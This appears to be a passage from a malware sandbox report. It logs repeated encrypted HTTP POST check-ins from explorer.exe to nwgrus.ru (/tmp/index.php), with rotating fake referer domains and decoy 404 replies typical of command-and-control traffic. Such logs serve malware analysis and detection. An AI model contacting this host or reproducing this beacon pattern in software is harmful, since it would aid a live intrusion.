                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      27192.168.2.449764109.175.29.39802580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 00:20:21.660253048 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://bojujhdxlnt.net/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 243
                                                                                                      Host: nwgrus.ru
                                                                                                      Oct 8, 2024 00:20:21.660337925 CEST243OUTData Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 39 59 ba ec
                                                                                                      Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vu9YEzYk,SM{uNFMk5W3L/3$Fs-0<MU`H_#<oSC%9[xQKz_';\C
                                                                                                      Oct 8, 2024 00:20:22.408415079 CEST484INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx/1.26.0
                                                                                                      Date: Mon, 07 Oct 2024 22:20:22 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      28192.168.2.449765109.175.29.39802580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 00:20:22.419502020 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://lbaiglgwxhkmq.net/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 222
                                                                                                      Host: nwgrus.ru
                                                                                                      Oct 8, 2024 00:20:22.419570923 CEST222OUTData Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 10 6b 2c 90 f5 76 0b 75 2c 43 a3 81
                                                                                                      Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vu,CJcvz2Hje2.dhQ;m>f!A@VD^B1vm+]rzg_UWF"1L~5
                                                                                                      Oct 8, 2024 00:20:23.179668903 CEST484INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx/1.26.0
                                                                                                      Date: Mon, 07 Oct 2024 22:20:23 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      29192.168.2.449767109.175.29.39802580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 00:20:23.187813997 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://oxivfaqdhau.net/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 292
                                                                                                      Host: nwgrus.ru
                                                                                                      Oct 8, 2024 00:20:23.187836885 CEST292OUTData Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 11 6b 2c 90 f5 76 0b 75 5f 09 b4 f1
                                                                                                      Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vu_X@GdTkoWkx3MG\u~2"wq1Wak"Zv4 Ka3l~dI ui@{Q\
                                                                                                      Oct 8, 2024 00:20:23.966139078 CEST484INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx/1.26.0
                                                                                                      Date: Mon, 07 Oct 2024 22:20:23 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      30192.168.2.449773109.175.29.39802580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 00:20:23.976464033 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://eihcpyqadleca.net/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 307
                                                                                                      Host: nwgrus.ru
                                                                                                      Oct 8, 2024 00:20:23.976478100 CEST307OUTData Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 16 6b 2c 90 f5 76 0b 75 4e 2b fe 80
                                                                                                      Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vuN+EDaEHZf|ua_X=m$:JGKWT@+@99GfL;lf>/q9+YU]-m{FR
                                                                                                      Oct 8, 2024 00:20:24.908112049 CEST484INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx/1.26.0
                                                                                                      Date: Mon, 07 Oct 2024 22:20:24 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      31192.168.2.449774109.175.29.39802580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 00:20:24.926609993 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://olgjjvecsjugbyj.com/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 128
                                                                                                      Host: nwgrus.ru
                                                                                                      Oct 8, 2024 00:20:24.926647902 CEST128OUTData Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 17 6b 2c 90 f5 76 0b 75 3b 49 da bb
                                                                                                      Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vu;Io5rc&:M-mJV"{
                                                                                                      Oct 8, 2024 00:20:26.072292089 CEST484INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx/1.26.0
                                                                                                      Date: Mon, 07 Oct 2024 22:20:25 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      32192.168.2.449786109.175.29.39802580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 00:20:26.082185030 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://wjiuupaachvppk.com/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 288
                                                                                                      Host: nwgrus.ru
                                                                                                      Oct 8, 2024 00:20:26.082211971 CEST288OUTData Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 14 6b 2c 90 f5 76 0b 75 72 23 df eb
                                                                                                      Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vur#s;z2+#1m~6c|h:HKpN84&Fo^4K?q]uHPAu!'t,dmo~$1
                                                                                                      Oct 8, 2024 00:20:26.857687950 CEST484INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx/1.26.0
                                                                                                      Date: Mon, 07 Oct 2024 22:20:26 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      33192.168.2.450057109.175.29.39802580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 00:21:32.500380039 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://csuhbuxabuhlm.org/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 275
                                                                                                      Host: nwgrus.ru
                                                                                                      Oct 8, 2024 00:21:32.500399113 CEST275OUTData Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 57 3c d5 91
                                                                                                      Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA .[k,vuW<vIPxs*,]s71c&-Zo\R!pGETo^#$n.;3ra7Cpv.dmye; f
                                                                                                      Oct 8, 2024 00:21:33.566517115 CEST151INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx/1.26.0
                                                                                                      Date: Mon, 07 Oct 2024 22:21:33 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                                                      Data Ascii: r


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      34192.168.2.450058109.175.29.39802580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 00:21:34.419028044 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://lixbbuexbbyxijy.com/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 140
                                                                                                      Host: nwgrus.ru
                                                                                                      Oct 8, 2024 00:21:34.419050932 CEST140OUTData Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 50 28 a0 a5
                                                                                                      Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA .[k,vuP(KRCaVsE[Ho5:4e-V2TG8v~
                                                                                                      Oct 8, 2024 00:21:35.197633028 CEST151INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx/1.26.0
                                                                                                      Date: Mon, 07 Oct 2024 22:21:35 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                                                      Data Ascii: r


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      35192.168.2.450059109.175.29.39802580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 00:21:36.966672897 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://snydbdaflsjf.net/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 140
                                                                                                      Host: nwgrus.ru
                                                                                                      Oct 8, 2024 00:21:36.966702938 CEST140OUTData Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 47 58 c6 bd
                                                                                                      Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA .[k,vuGX#OQWW0IGqH,8]35E~
                                                                                                      Oct 8, 2024 00:21:37.723088026 CEST151INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx/1.26.0
                                                                                                      Date: Mon, 07 Oct 2024 22:21:37 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                                                      Data Ascii: r


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      36192.168.2.450060109.175.29.39802580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 00:21:38.994489908 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://toxykxlssds.com/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 112
                                                                                                      Host: nwgrus.ru
                                                                                                      Oct 8, 2024 00:21:38.994489908 CEST112OUTData Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 54 4e ef 9a
                                                                                                      Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA .[k,vuTNh!FCL5WW*AtX
                                                                                                      Oct 8, 2024 00:21:39.804027081 CEST151INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx/1.26.0
                                                                                                      Date: Mon, 07 Oct 2024 22:21:39 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                                                      Data Ascii: r


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      37192.168.2.450061109.175.29.39802580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 00:21:51.599035978 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://wujymmrsholuwdm.com/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 148
                                                                                                      Host: nwgrus.ru
                                                                                                      Oct 8, 2024 00:21:51.599056005 CEST148OUTData Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 31 5b c0 89
                                                                                                      Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA .[k,vu1[b3vY`q@8U 4YFF\JXM/zGHh
                                                                                                      Oct 8, 2024 00:21:52.354597092 CEST151INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx/1.26.0
                                                                                                      Date: Mon, 07 Oct 2024 22:21:52 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close
